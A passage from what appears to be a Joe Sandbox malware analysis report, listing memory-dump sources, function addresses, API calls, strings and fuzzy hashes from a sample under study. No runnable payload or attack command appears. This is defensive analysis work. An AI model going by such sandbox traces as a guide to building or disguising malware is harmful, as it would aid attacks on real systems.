                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: State
                                    • String ID:
                                    • API String ID: 1649606143-0
                                    • Opcode ID: 6344f1bab86d7d499fc22d0e91c470b055b31e92c6fef73befb1b9e719a37a10
                                    • Instruction ID: 2a1ecde81c7ec4b49f438093cb83609cd4c2892025d2c29521775e66aae8aebb
                                    • Opcode Fuzzy Hash: 6344f1bab86d7d499fc22d0e91c470b055b31e92c6fef73befb1b9e719a37a10
                                    • Instruction Fuzzy Hash: 510126DFD001652AEF341E65A909BF645410708B53F55A033C90D3B3D0974C0E8A23AE
                                    Function 02426A85 Relevance: 4.5, Strings: 3, Instructions: 787COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExchangeInterlocked
                                    • String ID: x$z${
                                    • API String ID: 367298776-1334427886
                                    • Opcode ID: 518b07cac4c6f36476c1c67daaaaa543ef6772b5266a017a9aaa299c66b33734
                                    • Instruction ID: 96c843df5b01ffe00201c1fc0585832960238461ca356d9eb6d17a96a97673af
                                    • Opcode Fuzzy Hash: 518b07cac4c6f36476c1c67daaaaa543ef6772b5266a017a9aaa299c66b33734
                                    • Instruction Fuzzy Hash: 8B625FB1D00119DFCF14CF9AC981AAEB7B6EF94304F64826AE419A7380D7349A59CF91
                                    Function 004A9CB0 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 16775bfd5a3ae423afd537c71043936eb0420267c6721a57d0081ac1be912458
                                    • Instruction ID: b49cf7f59c066e05df4e31f3c9b16d169fc45c1287d8167037eb9d0ae4ba6baf
                                    • Opcode Fuzzy Hash: 16775bfd5a3ae423afd537c71043936eb0420267c6721a57d0081ac1be912458
                                    • Instruction Fuzzy Hash: EFF04F31500109BBCF015F61CC089AE7FA9BF26354B24C026F806D5161DB38DE96DB59
                                    Function 00454DB8 Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                    Download Yara Rule
                                    Strings
                                    • known incorrect sRGB profile, xrefs: 00454F6E
                                    • out-of-date sRGB profile with no signature, xrefs: 00454F86
                                    • copyright violation: edited ICC profile ignored, xrefs: 00454F27
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: copyright violation: edited ICC profile ignored$known incorrect sRGB profile$out-of-date sRGB profile with no signature
                                    • API String ID: 0-1307623137
                                    • Opcode ID: e661e9a12c3015677a6cae10271151397bad33302d99bfe9cb97a8195a296cdb
                                    • Instruction ID: 1fc8f86739117a4990dd67df882cfccada23379f083427f40dd39fa0c4c51d77
                                    • Opcode Fuzzy Hash: e661e9a12c3015677a6cae10271151397bad33302d99bfe9cb97a8195a296cdb
                                    • Instruction Fuzzy Hash: 3251F8B270879107DB28CE394C51767BBE35BD5309F09986DE4D9CB342E524D509C754
                                    Function 0043E810 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                                    Download Yara Rule
                                    APIs
                                    • ioctlsocket.WS2_32(?,4004667F,?), ref: 0043E842
                                    • recvfrom.WS2_32(00000000,00000000,?,00000000,00000000,00000000), ref: 0043E890
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ioctlsocketrecvfrom
                                    • String ID:
                                    • API String ID: 217199969-0
                                    • Opcode ID: 0cf103955d4178ba78a1e03da9a319beddda152bb23b160249005a05bd6b76ca
                                    • Instruction ID: 60d1552222b3cc75efc616f7b96f6fd96c91d10a5a022f67f5e7dc17b423705f
                                    • Opcode Fuzzy Hash: 0cf103955d4178ba78a1e03da9a319beddda152bb23b160249005a05bd6b76ca
                                    • Instruction Fuzzy Hash: BF215170605601ABD318EF25C955F6BB7E4AB98724F108B2EF09AC32D0D778DC45CB5A
                                    Function 004C6C59 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetVersion.KERNEL32(?,004C6CFC,005BDEE8,004C60AC,00000010,00000000,00000100,005BDEE8,?,?,004C5A93,004C5AF6,004C5377,004C1DA3,00000100,004C1D3C), ref: 004C6C6C
                                    • RtlInitializeCriticalSection.NTDLL(00614470), ref: 004C6C91
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CriticalInitializeSectionVersion
                                    • String ID:
                                    • API String ID: 385228656-0
                                    • Opcode ID: fd420175d937f1213ac15c1cc57802f910c9da9852adc28f7a71da19d73a5846
                                    • Instruction ID: c5177978bdfb8c80f9bd1b793fd9c4f8ea1d3977fde55b36c6a81220e3269119
                                    • Opcode Fuzzy Hash: fd420175d937f1213ac15c1cc57802f910c9da9852adc28f7a71da19d73a5846
                                    • Instruction Fuzzy Hash: 68E0E6B4481210A7E3A15F14FD04FD537A3F71E71FF59902BE58646164CFB8644186DC
                                    Function 00433500 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileA.KERNEL32(?,?), ref: 00433510
                                    • FindClose.KERNEL32(00000000), ref: 0043351C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: 60385712d254f65724af7c97080f05b1d10d531a49dcf9ca43deb725226e6401
                                    • Instruction ID: 461013a3db1cce88a7919f48674d83daf3f644474f9bca53d57dcfb8c7ce60fa
                                    • Opcode Fuzzy Hash: 60385712d254f65724af7c97080f05b1d10d531a49dcf9ca43deb725226e6401
                                    • Instruction Fuzzy Hash: 0AD0A7B8C002416BD3119F75DD08ABA3259A74C321FC40A38BD2DC12F0F63EC9588567
                                    Function 0043CA90 Relevance: 2.8, Strings: 2, Instructions: 257COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: MTrk$d
                                    • API String ID: 0-4044675371
                                    • Opcode ID: a0e75f79ab4b39e11bcc3c33668d8f89fe061cc056b73e4a3c471ca4ce6b0880
                                    • Instruction ID: 3a687d183b7353a186c28e5fd2b2a7b0be60239ce42140adb1f641ca3cbc2cab
                                    • Opcode Fuzzy Hash: a0e75f79ab4b39e11bcc3c33668d8f89fe061cc056b73e4a3c471ca4ce6b0880
                                    • Instruction Fuzzy Hash: 25919171B006059FD718DF29D8C196AB7E2EFC8304F14993EE84ACB345DA39E905CB59
                                    Function 00435B20 Relevance: 2.1, APIs: 1, Instructions: 638COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 73a90cc2ea03b15300d6b4bfa94f26eb780ab8f9b1d68e9028b3679348836136
                                    • Instruction ID: 47ffe90eae9be606585cff3e524e47c4447ecf42eda219c528cab9c548bc3f82
                                    • Opcode Fuzzy Hash: 73a90cc2ea03b15300d6b4bfa94f26eb780ab8f9b1d68e9028b3679348836136
                                    • Instruction Fuzzy Hash: 0732A471E00606DFDB14DFA9C881AEEB7B1BF5C314F24516AE406AB381D738AD41CB99
                                    Function 0042EE10 Relevance: 1.7, APIs: 1, Instructions: 171windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Iconic
                                    • String ID:
                                    • API String ID: 110040809-0
                                    • Opcode ID: 73fe98bbb4559f5d035be22fd8d979ff72324a0c125437ffc4360da54098be33
                                    • Instruction ID: bb1f7addb7f198911c1651ad9b6496061b7699192bd202d1273e17d09e5b5bf7
                                    • Opcode Fuzzy Hash: 73fe98bbb4559f5d035be22fd8d979ff72324a0c125437ffc4360da54098be33
                                    • Instruction Fuzzy Hash: 9161BB76210711CBD314CF2CD480B8AB7E5FBA9300F50886EE59ACB350C3B6E895CBA5
                                    Function 004343B0 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClassInfoA.USER32(?,?,?), ref: 004343C8
                                      • Part of subcall function 004BEA56: __EH_prolog.LIBCMT ref: 004BEA5B
                                      • Part of subcall function 004BEA56: GetClassInfoA.USER32(?,?,?), ref: 004BEA76
                                      • Part of subcall function 004BEA56: RegisterClassA.USER32(00000004), ref: 004BEA81
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Class$Info$H_prologRegister
                                    • String ID:
                                    • API String ID: 1678024082-0
                                    • Opcode ID: 973009e2e3370d31d8f964122859b548e6e22fa6b3ff83cddecd3006831dd548
                                    • Instruction ID: c2cbe502dff698237c6f2c2fd6c8703168e2d51fb39b9175b716e2577d497cb9
                                    • Opcode Fuzzy Hash: 973009e2e3370d31d8f964122859b548e6e22fa6b3ff83cddecd3006831dd548
                                    • Instruction Fuzzy Hash: AA017275909311AF8344DF1AD48095BBBF5FEC8654F40892EF49893320E73499458F96
                                    Function 00491670 Relevance: .9, Instructions: 903COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
